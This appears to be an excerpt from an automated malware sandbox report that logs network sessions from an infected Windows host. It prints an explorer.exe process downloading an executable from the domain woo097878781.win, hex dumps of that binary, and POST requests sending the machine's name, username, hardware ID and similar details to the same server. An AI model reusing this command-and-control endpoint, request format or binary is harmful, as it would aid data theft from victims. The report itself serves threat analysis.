                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 0d 4f 2b 23 2c 55 2b 28 3e 41 1c 14 44 01 07 40 59 28 19 24 01 07 11 2b 15 4d 42 59 09 3b 23 28 5e 0c 34 58 5b 58 3c 3a 1d 19 2e 19 26 37 01 3a 47 45 22 26 39 4a 19 4d 18 52 22 06 1f 09 3a 12 35 39 2b 13 27 26 23 2c 22 1b 47 3b 1c 01 59 52 3d 49 41 45 25 35 1d 49 22 2a 24 28 2d 35 3d 1f 07 16 00 2f 0b 2d 07 1e 28 45 25 0c 33 27 2b 37 07 3c 29 36 01 02 0e 10 37 21 40 3b 21 35 0a 57 16 09 18 23 24 0f 57 2e 10 05 3a 46 26 2d 5b 1e 1a 29 31 08 5f 14 59 18 1c 1c 04 17 16 1b 1d 3a 28 20 29 3b 05 5f 34 0d 0d 01 00 05 19 16 21 0a 27 5a 23 3b 2b 03 0e 4a 3a 3c 2c 27 30 29 07 57 39 03 1c 0f 09 5d 37 5c 30 14 39 5d 1f 5e 3c 38 1d 15 44 2d 19 17 25 49 06 34 1f 13 34 26 11 35 1a 23 09 08 5c 3b 54 26 1f 08 04 44 13 59 58 2d 15 33 08 1c 2a 39 05 2e 26 09 47 1f 10 00 20
                                                                          Data Ascii: O+#,U+(>AD@Y($+MBY;#(^4X[X<:.&7:GE"&9JMR":59+'&#,"G;YR=IAE%5I"*$(-5=/-(E%3'+7<)67!@;!5W#$W.:F&-[)1_Y:( );_4!'Z#;+J:<,'0)W9]7\09]^<8D-%I44&5#\;T&DYX-3*9.&G
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 3e 19 30 2a 52 36 1e 0d 26 17 00 3c 01 2d 1f 01 15 40 1e 36 0d 3f 1a 2b 2a 34 02 02 2b 41 1e 19 19 00 5e 06 24 3c 36 1e 21 0b 3e 30 16 5c 00 38 03 2b 00 29 3d 59 24 09 08 4c 39 59 2e 1a 0d 53 2c 0d 10 42 12 0a 2f 52 1d 3f 39 32 22 1a 1c 38 1c 01 28 1f 58 45 23 0c 1e 2a 32 16 13 0a 00 1c 3a 22 1a 3f 3d 21 11 52 1d 16 1e 12 45 14 1d 14 22 13 19 01 17 46 19 22 3d 10 3b 24 13 2b 5b 29 27 18 40 50 08 27 2e 0e 3d 38 41 1b 59 2b 22 48 20 1c 05 58 3c 2b 38 4f 19 1a 36 0b 1f 30 5d 0c 3c 36 02 18 01 47 11 40 07 1c 1e 4e 44 03 02 30 1a 01 13 0c 24 17 1a 3d 22 1c 00 41 1f 03 46 1b 06 33 15 18 06 28 3e 18 11 23 03 45 45 5e 05 21 34 06 35 3f 1b 30 5e 1b 43 4f 1c 17 11 09 13 4d 5f 12 3a 10 5e 1b 2f 31 25 34 3c 13 26 59 19 2c 3b 48 29 37 1e 33 20 48 40 4b 36 06 2e 1f 02
                                                                          Data Ascii: >0*R6&<-@6?+*4+A^$<6!>0\8+)=Y$L9Y.S,B/R?92"8(XE#*2:"?=!RE"F"=;$+[)'@P'.=8AY+"H X<+8O60]<6G@ND0$="AF3(>#EE^!45?0^COM_:^/1%4<&Y,;H)73 H@K6.
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 0e 3f 25 05 5a 54 0b 59 24 1b 01 46 10 21 5d 13 25 23 5f 3d 07 3a 1f 2b 23 28 14 25 21 3e 51 35 37 2d 26 07 45 04 3e 2c 3d 34 46 24 30 1e 37 0b 47 3b 22 5a 1c 01 46 20 14 17 12 3d 0d 35 13 30 57 33 30 08 3c 29 09 5e 01 23 25 47 00 3c 2c 1d 19 19 15 05 2b 3c 13 19 14 2c 20 40 0f 1c 5a 0a 2c 1d 08 19 2c 5a 11 18 5b 1e 1d 24 21 16 5a 03 47 3d 3c 5a 18 05 39 0f 22 3f 4c 01 14 46 2e 2e 2a 32 48 0f 12 22 26 27 1e 21 25 39 1f 45 27 3d 2c 07 0a 14 57 3b 26 2e 36 52 38 18 0b 29 46 41 05 0a 5a 27 13 1f 0a 04 0b 38 04 41 3a 1b 27 0b 03 16 1a 34 5c 3b 5c 49 3a 35 10 33 31 39 2c 35 02 34 0b 2d 3d 5d 0d 3b 2b 05 3d 01 37 2f 14 48 18 32 08 1a 5f 47 2d 22 35 0b 1e 17 2f 29 33 4d 5c 14 01 1b 5b 59 06 52 21 05 06 47 43 2a 07 17 3d 1e 49 36 0e 11 0d 13 1e 33 03 23 38 42 5c
                                                                          Data Ascii: ?%ZTY$F!]%#_=:+#(%!>Q57-&E>,=4F$07G;"ZF =50W30<)^#%G<,+<, @Z,,Z[$!ZG=<Z9"?LF..*2H"&'!%9E'=,W;&.6R8)FAZ'8A:'4\;\I:5319,54-=];+=7/H2_G-"5/)3M\[YR!GC*=I63#8B\
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 1a 4a 0b 19 58 20 37 0f 02 05 38 2c 39 36 1f 1c 23 45 05 39 09 26 28 2e 45 1e 01 5d 2a 35 1c 19 3d 13 3c 38 02 22 0f 0f 1f 05 23 41 21 02 14 1b 33 21 2a 01 2c 47 27 32 25 18 36 19 2b 11 2b 19 1c 1e 00 1b 20 0e 5c 31 25 49 46 39 15 59 01 28 3e 1f 09 1d 29 2a 5e 31 41 56 00 31 30 32 26 1d 06 3f 3f 0b 41 16 21 2c 27 17 2e 43 00 59 5a 13 35 14 44 21 2e 14 5b 4b 22 00 0c 3d 34 40 04 2e 08 1c 2b 30 21 26 11 0f 1d 1c 32 24 38 2a 37 0b 35 47 1e 03 5e 00 13 1f 3f 3d 1d 00 1e 03 03 11 5f 29 06 07 05 06 25 09 08 03 46 31 18 3c 05 40 32 02 1c 59 02 04 1a 51 25 4b 41 4a 17 30 22 3d 2c 34 29 0a 26 36 4f 24 3e 40 1f 21 31 16 36 23 32 41 45 0c 2b 22 5f 33 13 00 27 23 2e 11 01 4b 02 30 3d 5f 1c 00 12 0f 2e 46 00 12 3c 09 02 3b 45 1c 37 3b 1e 31 2b 18 40 09 04 25 2f 42 2a
                                                                          Data Ascii: JX 78,96#E9&(.E]*5=<8"#A!3!*,G'2%6++ \1%IF9Y(>)*^1AV102&??A!,'.CYZ5D!.[K"=4@.+0!&2$8*75G^?=_)%F1<@2YQ%KAJ0"=,4)&6O$>@!16#2AE+"_3'#.K0=_.F<;E7;1+@%/B*
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 1f 2f 3b 2f 1d 5f 54 29 2d 2b 18 10 3f 0d 37 2a 17 46 2a 1d 1f 1e 5d 2f 3b 28 26 11 1e 1a 0c 57 3b 38 19 24 0b 43 54 26 2c 29 06 13 25 1b 3c 41 3a 33 3c 37 28 33 5f 4c 3a 41 3f 28 36 1e 59 12 28 02 35 3c 1c 24 2a 11 01 44 03 1f 1b 38 0b 23 3f 24 08 20 5f 33 2b 10 41 20 00 35 3b 45 23 21 3a 2d 1d 1c 00 0e 29 18 5e 1b 1d 17 34 08 17 40 0c 10 18 06 03 0b 19 38 1d 03 5a 24 4a 35 51 3a 28 16 5e 51 18 1b 2b 08 42 15 26 00 17 5d 34 52 4f 35 19 18 04 42 21 19 4b 36 43 20 09 45 1c 3b 0d 0c 42 5e 45 1a 5d 09 24 09 3d 01 08 1d 27 2e 27 27 42 58 20 10 39 10 06 28 40 21 35 15 05 20 5a 38 3e 04 1c 59 35 38 3d 21 18 10 10 02 56 08 1c 17 41 1c 3d 15 1c 3d 04 41 0d 11 1a 34 02 21 2b 03 3c 38 1f 34 25 44 13 49 27 0f 4a 5a 5e 3c 18 49 45 20 56 31 0e 09 27 1a 10 19 13 1c 46
                                                                          Data Ascii: /;/_T)-+?7*F*]/;(&W;8$CT&,)%<A:3<7(3_L:A?(6Y(5<$*D8#?$ _3+A 5;E#!:-)^4@8Z$J5Q:(^Q+B&]4RO5B!K6C E;B^E]$='.''BX 9(@!5 Z8>Y58=!VA==A4!+<84%DI'JZ^<IE V1'F


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649756154.216.20.2434435020C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:07:31 UTC171OUTGET /64.EXE HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Host: woo097878781.win
                                                                          2024-12-08 14:07:32 UTC274INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:32 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 1021952
                                                                          Last-Modified: Mon, 18 Nov 2024 12:28:55 GMT
                                                                          Connection: close
                                                                          ETag: "673b3307-f9800"
                                                                          X-Powered-By: PleskLin
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 14:07:32 UTC16110INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 48 87 75 ed 29 e9 26 ed 29 e9 26 ed 29 e9 26 f6 b4 77 26 e7 29 e9 26 e4 51 6e 26 ec 29 e9 26 e4 51 7a 26 fc 29 e9 26 ed 29 e8 26 4f 29 e9 26 f6 b4 42 26 d9 29 e9 26 f6 b4 43 26 90 29 e9 26 f6 b4 74 26 ec 29 e9 26 52 69 63 68 ed 29 e9 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 ea e3 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 46 0d
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Hu)&)&)&w&)&Qn&)&Qz&)&)&O)&B&)&C&)&t&)&Rich)&PEd6g"F
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 24 60 ff 15 ba 16 0d 00 8b 44 24 68 39 44 24 48 0f 85 8d 01 00 00 48 c7 44 24 78 00 00 00 00 48 8d 15 8c 26 0d 00 48 8b 4c 24 70 e8 92 6b 00 00 48 89 44 24 78 48 83 7c 24 78 00 0f 84 62 01 00 00 48 8d 15 7a 26 0d 00 48 8b 4c 24 78 e8 70 6b 00 00 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 0f 84 3a 01 00 00 48 8b 84 24 80 00 00 00 48 83 c0 11 48 89 84 24 80 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 48 63 84 24 88 00 00 00 48 8b 8c 24 80 00 00 00 0f be 04 01 83 f8 22 74 12 8b 84 24 88 00 00 00 ff c0 89 84 24 88 00 00 00 eb d5 4c 8d 84 24 98 00 00 00 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 c3 ab 0b 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 0f 84 bd 00 00 00 48 8b 84 24 90 00 00 00 48 83 c0 05 48 89 84 24 b0 00 00 00 8b 84 24 98 00
                                                                          Data Ascii: $`D$h9D$HHD$xH&HL$pkHD$xH|$xbHz&HL$xpkH$H$:H$HH$$Hc$H$"t$$L$$H$H$H$H$HH$$
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 00 00 00 48 8d 8c 24 b8 00 00 00 e8 92 2d 00 00 8b 8c 24 38 01 00 00 48 63 94 24 f4 00 00 00 4c 8b 84 24 30 01 00 00 49 8d 14 50 48 89 94 24 10 01 00 00 4c 8b c8 4c 8d 05 45 f6 0c 00 8b d1 48 8b 84 24 10 01 00 00 48 8b c8 e8 43 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 8b 84 24 38 01 00 00 48 63 8c 24 f4 00 00 00 48 8b 94 24 30 01 00 00 48 8d 0c 4a 4c 8d 05 1b f6 0c 00 8b d0 e8 08 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 48 8d 8c 24 b8 00 00 00 e8 e9 2b 00 00 90 48 8d 8c 24 90 00 00 00 e8 db 2b 00 00 90 48 8d 4c 24 30 e8 d0 2b 00 00 90 48 8d 4c 24 60 e8 c5 2b 00 00 48 8b 8c 24 18 01 00 00 48 33 cc e8 b5 9e 0b 00 48 81 c4 28 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 48 89 54 24 10 48 89 4c
                                                                          Data Ascii: H$-$8Hc$L$0IPH$LLEH$HC$$$8Hc$H$0HJL$$H$+H$+HL$0+HL$`+H$H3H(LD$HT$HL
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 84 24 30 01 00 00 ff c0 89 84 24 30 01 00 00 48 63 84 24 30 01 00 00 48 83 f8 6a 0f 83 e6 00 00 00 83 bc 24 f0 0a 00 00 00 74 7a 48 63 84 24 30 01 00 00 48 8d 0d a8 b5 0d 00 4c 8d 8c 24 40 01 00 00 41 b8 08 00 00 00 8b 94 24 f0 0a 00 00 48 8b 0c c1 e8 da fc ff ff 48 8d 94 24 40 01 00 00 48 8b 4c 24 30 ff 15 f7 94 0c 00 48 89 84 24 c0 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 90 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c0 09 00 00 48 89 08 48 83 bc 24 c0 09 00 00 00 75 07 33 c0 e9 ff 13 00 00 eb 5d 48 63 84 24 30 01 00 00 48 8d 0d 2e b5 0d 00 48 8b 04 c1 48 83 c0 08 48 8b d0 48 8b 4c 24 30 ff 15 98 94 0c 00 48 89 84 24 c8 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 31 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c8 09 00 00 48 89 08 48 83 bc 24 c8 09 00 00 00 75 07 33 c0 e9 a0
                                                                          Data Ascii: $0$0Hc$0Hj$tzHc$0HL$@A$HH$@HL$0H$Hc$0HHH$HH$u3]Hc$0H.HHHHL$0H$Hc$0H1HH$HH$u3
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 1c 8b 44 24 14 99 83 e2 03 03 c2 c1 f8 02 8b 4c 24 1c 2b c8 8b c1 89 44 24 14 8b 44 24 14 05 f4 05 00 00 89 44 24 08 66 0f 6e 44 24 08 f3 0f e6 c0 f2 0f 5c 05 a1 eb 0c 00 f2 0f 5e 05 91 eb 0c 00 f2 0f 2c c0 89 44 24 0c 8b 44 24 0c 25 ff 7f 00 00 69 c0 ad 8e 00 00 99 b9 64 00 00 00 f7 f9 89 44 24 18 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 66 0f 6e c0 f3 0f e6 c0 f2 0f 5e 05 4a eb 0c 00 f2 0f 2c c0 89 04 24 66 0f 6e 04 24 f3 0f e6 c0 f2 0f 10 0d 32 eb 0c 00 f2 0f 59 c8 66 0f 28 c1 f2 0f 2c c0 89 44 24 10 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 2b 44 24 10 48 8b 4c 24 40 89 41 10 83 3c 24 0e 7d 0b 8b 04 24 ff c8 89 44 24 20 eb 0a 8b 04 24 83 e8 0d 89 44 24 20 48 8b 44 24 40 8b 4c 24 20 89 48 0c 48 8b 44 24 40 83 78 0c 02 7e 0f 8b 44 24 0c 2d 6c 12 00 00 89 44 24 24
                                                                          Data Ascii: D$L$+D$D$D$fnD$\^,D$D$%idD$D$L$+fn^J,$fn$2Yf(,D$D$L$++D$HL$@A<$}$D$ $D$ HD$@L$ HHD$@x~D$-lD$$
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 75 0a 48 8b 44 24 38 48 89 44 24 20 83 bc 24 0c 01 00 00 00 7c 37 c7 44 24 34 00 00 00 00 eb 0a 8b 44 24 34 ff c0 89 44 24 34 8b 84 24 0c 01 00 00 39 44 24 34 7d 14 48 63 44 24 34 48 8b 4c 24 38 0f be 04 01 85 c0 74 02 eb d5 eb 0e 48 8b 4c 24 38 e8 0b 15 00 00 89 44 24 34 e9 fb 04 00 00 0f b6 84 24 08 01 00 00 83 f8 0e 75 0d c7 84 24 f4 01 00 00 22 00 00 00 eb 0b c7 84 24 f4 01 00 00 27 00 00 00 0f b6 84 24 f4 01 00 00 88 84 24 70 01 00 00 0f b6 84 24 e0 00 00 00 85 c0 74 17 48 8b 8c 24 f0 00 00 00 e8 85 07 00 00 48 89 84 24 68 01 00 00 eb 28 48 8b 84 24 40 02 00 00 48 83 c0 08 48 89 84 24 40 02 00 00 48 8b 84 24 40 02 00 00 48 8b 40 f8 48 89 84 24 68 01 00 00 48 83 bc 24 68 01 00 00 00 75 0d c7 84 24 f8 01 00 00 01 00 00 00 eb 0b c7 84 24 f8 01 00 00 00
                                                                          Data Ascii: uHD$8HD$ $|7D$4D$4D$4$9D$4}HcD$4HL$8tHL$8D$4$u$"$'$$p$tH$H$h(H$@HH$@H$@H@H$hH$hu$$
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: 00 00 48 8b 4c 24 38 4c 8b 49 30 4c 8d 05 b8 28 0d 00 8b d0 b9 0a 08 00 00 e8 14 ec ff ff 89 44 24 30 83 7c 24 40 02 7c 29 8b 05 3b 0c 0d 00 ff c0 48 8b 4c 24 38 48 83 c1 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b d0 e8 c0 fb ff ff 83 7c 24 68 00 75 11 83 7c 24 40 01 7c 0a 48 8b 4c 24 38 e8 48 fd ff ff 83 7c 24 40 03 7c 28 48 8b 44 24 38 48 83 c0 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b 15 d9 0b 0d 00 48 8b c8 e8 79 fb ff ff 48 8b 44 24 38 0f b6 4c 24 68 88 48 18 8b 44 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                          Data Ascii: HL$8LI0L(D$0|$@|);HL$8HD$ AE3|$hu|$@|HL$8H|$@|(HD$8HD$ AE3HyHD$8L$hHD$0HXT$HL$3HT$HL$3
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: 48 8b 44 24 60 48 63 40 08 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 38 48 8b 44 24 38 48 8b 4c 24 20 48 89 08 48 8b 44 24 38 48 83 c0 38 48 8b 4c 24 38 48 89 41 08 48 8b 44 24 38 c6 40 15 01 48 8b 44 24 38 c6 40 16 00 48 8b 44 24 38 48 8b 4c 24 60 48 8b 49 40 48 89 48 18 48 8b 44 24 60 48 8b 4c 24 38 48 89 48 40 48 8b 44 24 60 48 63 40 10 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 20 e9 60 ff ff ff 48 8b 44 24 60 48 83 78 40 00 74 0a c7 44 24 48 01 00 00 00 eb 08 c7 44 24 48 00 00 00 00 8b 44 24 48 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 48 c7 44 24 20 00 00 00 00 8b 05 25 8d 0d 00 39 44 24 40 0f 8f 92 00 00 00 48 8b 0d 30 8d 0d 00 e8 83 56 ff ff 48 8b 05 2c 8d 0d 00 48 89 44 24 20 48 83 7c 24
                                                                          Data Ascii: HD$`Hc@HL$ HHHD$8HD$8HL$ HHD$8H8HL$8HAHD$8@HD$8@HD$8HL$`HI@HHHD$`HL$8HH@HD$`Hc@HL$ HHHD$ `HD$`Hx@tD$HD$HD$HHXL$H8HD$ %9D$@H0VH,HD$ H|$
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: d2 8b 44 24 28 b9 08 00 00 00 f7 f1 8b c0 48 8b 4c 24 20 0f b6 44 01 10 8b 4c 24 28 83 e1 07 ba 01 00 00 00 d3 e2 8b ca 23 c1 85 c0 74 0a c7 44 24 08 01 00 00 00 eb 08 c7 44 24 08 00 00 00 00 8b 44 24 08 eb 68 eb 66 8b 44 24 28 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 8b 44 24 28 ff c0 89 44 24 28 8b 44 24 04 48 8b 4c 24 20 83 7c 81 10 00 74 35 8b 44 24 04 48 8b 4c 24 20 8b 54 24 28 39 54 81 10 75 07 b8 01 00 00 00 eb 1d 8b 44 24 04 ff c0 8b c0 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 eb bb 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 58 c7 44 24 20 00 00 00 00 48 8b 44 24 60 48 8b 40 20 48 89 44 24 28 48 8b 44 24 28 0f b6 40 09 83 f8 02 0f 84 a9 00 00 00 48 8b 4c 24 28 e8 75 01 00 00 89 44
                                                                          Data Ascii: D$(HL$ DL$(#tD$D$D$hfD$(3|HHD$D$(D$(D$HL$ |t5D$HL$ T$(9TuD$3|HHD$3HHL$HXD$ HD$`H@ HD$(HD$(@HL$(uD
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: 10 48 8b 4c 24 28 48 8b 44 24 30 ff 90 00 01 00 00 48 8b 4c 24 28 e8 37 bc ff ff 48 8b 44 24 30 48 8b 48 70 e8 f9 a2 00 00 8b 44 24 20 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f bf 40 2e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f b6 40 09 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 7d 06 00 00 48 8b 44 24 30 0f bf 40 3c 85 c0 7c 26 48 8b 44 24 30 0f bf 40 3c 83 c0 03 8b d0 48 8b 4c 24 30 e8 28 00 00 00 b8 ff ff ff ff
                                                                          Data Ascii: HL$(HD$0HL$(7HD$0HHpD$ HHHL$HD$@.HL$HD$H@HHL$HD$H@HL$HD$@HL$H(HL$0}HD$0@<|&HD$0@<HL$0(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649774154.216.20.2434436196C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:07:37 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                          Accept: */*
                                                                          Connection: close
                                                                          Content-Length: 307
                                                                          Content-Type: application/json
                                                                          Host: woo097878781.win
                                                                          User-Agent: cpp-httplib/0.12.6
                                                                          2024-12-08 14:07:37 UTC307OUTData Raw: 7b 22 69 64 22 3a 22 6f 6d 73 69 68 6c 6f 79 77 66 61 6c 79 72 6f 62 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 67 70 75 22 3a 22 4d 36 36 39 4c 41 38 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 6f
                                                                          Data Ascii: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pro
                                                                          2024-12-08 14:07:37 UTC264INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:07:37 UTC28INData Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 11{"response":"ok"}0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649775154.216.20.2434436864C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:07:46 UTC234OUTPOST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 419
                                                                          2024-12-08 14:07:46 UTC403OUTData Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:07:46 UTC6OUTData Raw: 0d 00 0a 00 00 00
                                                                          Data Ascii:
                                                                          2024-12-08 14:07:46 UTC10OUTData Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:07:47 UTC231INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:46 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:07:47 UTC11INData Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649804154.216.20.2434436864C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:07:54 UTC234OUTPOST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 414
